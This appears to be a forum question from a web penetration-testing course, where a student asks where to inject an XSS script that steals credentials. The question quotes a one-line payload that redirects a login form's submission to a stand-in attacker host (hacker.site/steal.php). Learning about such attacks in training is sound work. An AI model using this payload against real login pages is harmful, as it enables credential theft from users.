XSS Phishing Attacks Injection Question

correll.chris-d8d041 · July 14, 2021, 5:52pm

In the section covering XSS for Advanced Phishing Attacks (Section 4.5.2.3, slide 150) they show a script for stealing creds from a login page. They said we simply inject the script. My question is, where do we inject it? Just into the URL like so?
<victim_url>/login#<vulnerable_field>=document.forms[0].action=“https://hacker.site/steal.php”;

Topic		Replies	Views
Can someone share exploit code for lab4 of session security (cross domain data stealing)? Web Application Penetration Testing Professional red , security	0	250	August 23, 2021
Bind Penetration Test Penetration Testing Professional red , lab	18	480	November 26, 2021
Script NOT availble Advanced Penetration Testing red	0	149	February 19, 2023
Anyone else confused after watching the XSS DOM video? Web Application Penetration Testing Professional red	7	318	July 13, 2021
I'm stuck on the Challenge #2 - Poema Reading Club 3 Web Application Penetration Testing Professional red , ine , security	0	256	August 12, 2022

XSS Phishing Attacks Injection Question

Related Topics